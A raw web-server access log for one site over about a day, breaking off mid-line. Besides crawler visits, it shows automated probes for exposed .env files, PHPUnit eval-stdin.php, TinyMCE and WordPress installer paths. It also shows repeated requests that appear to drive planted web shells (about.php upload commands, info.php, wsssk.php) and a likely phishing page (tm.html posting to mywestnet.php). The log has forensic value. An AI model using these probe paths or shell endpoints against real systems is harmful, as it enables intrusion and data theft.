Edit File: mgrokokbet.id.megahosting.pw-ssl_log
162.248.72.168 - - [22/Apr/2025:21:41:08 -0400] "GET /640275/about.php?ac=p&api=&path=&t=ddc09c13c65ad601aabdd847bfa585d8 HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 162.248.72.168 - - [22/Apr/2025:21:41:10 -0400] "GET /640275/about.php?ac=upload_bs_for_old&api=&path=/home/megavujh/mgrokokbet.id&t=ddc09c13c65ad601aabdd847bfa585d8&s=1 HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 43.130.111.126 - - [23/Apr/2025:00:39:10 -0400] "GET /.env HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 43.130.111.126 - - [23/Apr/2025:00:39:10 -0400] "POST / HTTP/1.1" 200 1245 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 43.130.111.126 - - [23/Apr/2025:00:39:17 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "python-requests/2.31.0" 108.136.206.220 - - [23/Apr/2025:00:50:03 -0400] "GET /admin/javascripts/tinymce/filemanager/dialog.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1" 54.84.93.8 - - [23/Apr/2025:01:50:20 -0400] "GET /?ND HTTP/1.1" 200 1248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 52.73.142.41 - - [23/Apr/2025:02:30:11 -0400] "GET /?MA HTTP/1.1" 200 1244 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 66.249.79.168 - - [23/Apr/2025:02:30:54 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; 
+http://www.google.com/bot.html)" 66.249.79.168 - - [23/Apr/2025:02:30:59 -0400] "GET /.well-known/assetlinks.json HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 202.157.184.38 - - [23/Apr/2025:03:00:56 -0400] "GET / HTTP/1.1" 200 1245 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 202.157.184.38 - - [23/Apr/2025:03:00:57 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 23.23.103.31 - - [23/Apr/2025:04:06:32 -0400] "GET /admin.php HTTP/1.1" 404 28 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:23:55 -0400] "POST /mgrokokbet.id/cobbler_api HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 206.189.144.184 - - [23/Apr/2025:05:23:58 -0400] "GET / HTTP/1.1" 200 1245 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 206.189.144.184 - - [23/Apr/2025:05:25:10 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 206.189.144.184 - - [23/Apr/2025:05:25:17 -0400] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:22 -0400] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:26 -0400] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:30 -0400] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 206.189.144.184 - - [23/Apr/2025:05:25:34 -0400] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240" 3.221.50.71 - - [23/Apr/2025:06:25:28 -0400] "GET /error_log HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 40.77.167.85 - - [23/Apr/2025:07:47:51 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 40.77.167.85 - - [23/Apr/2025:07:47:51 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 52.167.144.203 - - [23/Apr/2025:07:47:52 -0400] "GET / HTTP/1.1" 200 1068 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:53 -0400] "GET /wp-urhmj.php HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.216 - - [23/Apr/2025:07:47:54 -0400] "GET /?ND HTTP/1.1" 200 1079 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:54 -0400] "GET /?SA HTTP/1.1" 200 1076 "-" 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:54 -0400] "GET /info.php HTTP/1.1" 200 3117 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.216 - - [23/Apr/2025:07:47:54 -0400] "GET /about.php HTTP/1.1" 200 895 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.203 - - [23/Apr/2025:07:47:54 -0400] "GET /cgi-bin/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.167.144.216 - - [23/Apr/2025:07:47:55 -0400] "GET /640275/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 54.36.148.74 - - [23/Apr/2025:07:47:56 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 40.77.167.136 - - [23/Apr/2025:07:47:59 -0400] "GET /?MA HTTP/1.1" 200 1073 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 40.77.167.136 - - [23/Apr/2025:07:47:59 -0400] "GET /error_log HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 40.77.167.136 - - [23/Apr/2025:07:47:59 -0400] "GET /admin.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 52.70.138.176 - - [23/Apr/2025:08:52:04 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; 
+https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 35.169.119.108 - - [23/Apr/2025:08:52:09 -0400] "GET /640275/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 64.124.8.103 - - [23/Apr/2025:09:33:17 -0400] "GET /robots.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)" 64.124.8.103 - - [23/Apr/2025:09:33:18 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)" 108.136.206.220 - - [23/Apr/2025:10:20:34 -0400] "GET /admin/javascripts/tinymce/filemanager/filemanager/dialog.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1" 102.164.97.32 - - [23/Apr/2025:11:32:48 -0400] "GET /info.php HTTP/1.1" 200 3118 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:32:49 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:32:51 -0400] "POST /info.php HTTP/1.1" 200 8300 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:34:17 -0400] "POST /info.php HTTP/1.1" 200 3120 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:34:35 -0400] "POST /info.php HTTP/1.1" 200 31641 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:34:59 -0400] "POST /info.php HTTP/1.1" 200 3120 
"https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:36:10 -0400] "POST /info.php HTTP/1.1" 200 31666 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:36:15 -0400] "POST /info.php HTTP/1.1" 200 31681 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:36:22 -0400] "POST /info.php HTTP/1.1" 200 3120 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:10 -0400] "POST /info.php HTTP/1.1" 200 3167 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:32 -0400] "GET /wsssk.php HTTP/1.1" 200 3156 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:40 -0400] "POST /wsssk.php HTTP/1.1" 200 3109 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:46 -0400] "POST /info.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/info.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET / HTTP/1.1" 200 1058 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET 
/_autoindex/assets/css/autoindex.css HTTP/1.1" 200 1170 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/js/tablesort.js HTTP/1.1" 200 2137 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/icons/folder-fill.svg HTTP/1.1" 200 333 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/js/tablesort.number.js HTTP/1.1" 200 322 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:51 -0400] "GET /_autoindex/assets/icons/file-text.svg HTTP/1.1" 200 394 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:40:52 -0400] "GET /_autoindex/assets/icons/file.svg HTTP/1.1" 200 354 "https://mgrokokbet.id/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:01 -0400] "POST /wsssk.php HTTP/1.1" 200 2476 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:03 -0400] "POST /wsssk.php HTTP/1.1" 200 2493 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; 
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:13 -0400] "POST /wsssk.php HTTP/1.1" 200 3173 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:24 -0400] "GET /admin.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:41:33 -0400] "GET /about.php HTTP/1.1" 200 912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:12 -0400] "GET /wsssk.php HTTP/1.1" 200 3161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:20 -0400] "POST /wsssk.php HTTP/1.1" 200 3054 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:33 -0400] "GET /wp-urhmj.php HTTP/1.1" 200 1225 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:42:45 -0400] "POST /wsssk.php HTTP/1.1" 200 3036 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:43:35 -0400] "POST /wsssk.php HTTP/1.1" 200 3054 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:43:40 -0400] "GET /wp-urhmj.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 
Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:44:11 -0400] "POST /wsssk.php HTTP/1.1" 403 1242 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:44:22 -0400] "GET /wsssk.php HTTP/1.1" 200 3056 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:07 -0400] "POST /wsssk.php HTTP/1.1" 200 2477 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:24 -0400] "POST /wsssk.php HTTP/1.1" 200 3427 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:29 -0400] "POST /wsssk.php HTTP/1.1" 200 3116 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:32 -0400] "POST /wsssk.php HTTP/1.1" 200 2782 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:41 -0400] "POST /wsssk.php HTTP/1.1" 200 3116 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:45:59 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:46:04 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:46:16 -0400] "POST /mywestnet.php HTTP/1.1" 200 359 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:28 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:32 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:52 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:58:53 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:06 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:07 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:16 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:11:59:54 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 
"https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:12:00:06 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:12:00:09 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.32 - - [23/Apr/2025:12:00:14 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 3.94.40.182 - - [23/Apr/2025:12:10:51 -0400] "GET /cgi-bin/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 23.23.99.55 - - [23/Apr/2025:12:48:06 -0400] "GET /?SA HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:15 -0400] "GET /wp/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:16 -0400] "GET /new/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:18 -0400] "GET /old/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 
Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:19 -0400] "GET /wordpress/wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 143.198.90.128 - - [23/Apr/2025:12:48:19 -0400] "GET /wp-admin/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012;) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/104.0.5112.97 Mobile Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:04:58 -0400] "POST /wsssk.php HTTP/1.1" 200 3073 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:02 -0400] "POST /wsssk.php HTTP/1.1" 200 3069 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:05 -0400] "POST /wsssk.php HTTP/1.1" 200 3073 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:29 -0400] "POST /wsssk.php HTTP/1.1" 200 3103 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; 